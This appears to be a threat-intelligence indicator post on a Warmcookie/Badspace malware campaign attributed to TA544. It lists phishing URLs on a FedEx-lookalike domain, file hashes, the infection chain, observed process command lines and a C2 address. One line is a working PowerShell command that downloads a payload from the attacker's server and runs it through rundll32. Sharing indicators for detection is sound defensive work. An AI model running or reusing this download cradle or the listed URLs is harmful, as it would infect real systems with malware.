14.08.2024 | Warmcookie/Badspace | TA544 |

*************************************************

.url https://portals.checkfedexexp.com/documents?28f3c0c77f76899be4c6&medium=AUWRX&FXvk=326828c5ba7db1a8-8da5e6f8-aa891249-9a965b67-679dddc905f6c920738f2e&FA=67cd8d9486c68d6ea6dae8bcc72e43b81d07
.pdf c6c777beb38120497e6b26fea8f376652eafb5b661c65a87265421dc83f61121
.zip 91ab50b8c120a34eaed447e6b72355b97907fc51361174977c9fd13e590a8aa3
.js 2b504adfdf6c68889eae2207454ce4b647f31107c294106db597d3d29ad03ac3
.js 87f57a7a4b4c83ecb3cdd5f274c95cd452c703de604f68aff6e59964b662e3f8
.dll f4d2c9470b322af29b9188a3a590cbe85bacb9cc8fcd7c2e94d82271ded3f659

*************************************************

pdf > url > .js > js > .dll

wscript.exe C:\Users\Admin\AppData\Local\Temp\Invoice-417222890-001-7018851-836088.js

wscript.exe C:\Users\Admin\AppData\Local\Temp\1337.js

powershell.exe -nop -c "start-job { param($a) Import-Module BitsTransfer; $d = $env:temp + '\' + [System.IO.Path]::GetRandomFileName(); Start-BitsTransfer -Source 'http://72.5.43.29/data/e93629b052f25d25c92a4afaee51cc81' -Destination $d; if (![System.IO.File]::Exists($d)) {exit}; $p = $d + ',Start'; rundll32.exe $p; Start-Sleep -Seconds 10} -Argument 0 | wait-job | Receive-Job"

powershell.exe -Version 5.1 -s -NoLogo -NoProfile

rundll32.exe C:\Users\Admin\AppData\Local\Temp\vlvnsbto.own,Start

msedge.exe --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3924,i,398066294177910505,3755963153475235396,262144 --variations-seed-version --mojo-platform-channel-handle=4204 /

rundll32.exe C:\ProgramData\TechSparq\Updater.dll,Start /u

*************************************************

distro urls:

https://portals.checkfedexexp.com/documents?28f3c0c77f76899be4c6&medium=AUWRX&FXvk=326828c5ba7db1a8-8da5e6f8-aa891249-9a965b67-679dddc905f6c920738f2e&FA=67cd8d9486c68d6ea6dae8bcc72e43b81d07
https://chrome.checkfedexexp.com/data-privacy?rOy=ItdXZQ&uTc=oWVKUKxDZ&sourcelN=uyJcs&Pkcontent=YJzJvGndl&qv_cid=6358959&Yn=8813337
http://72.5.43.29/data/e93629b052f25d25c92a4afaee51cc81

*************************************************

c2's

http://72.5.43.29/

*************************************************
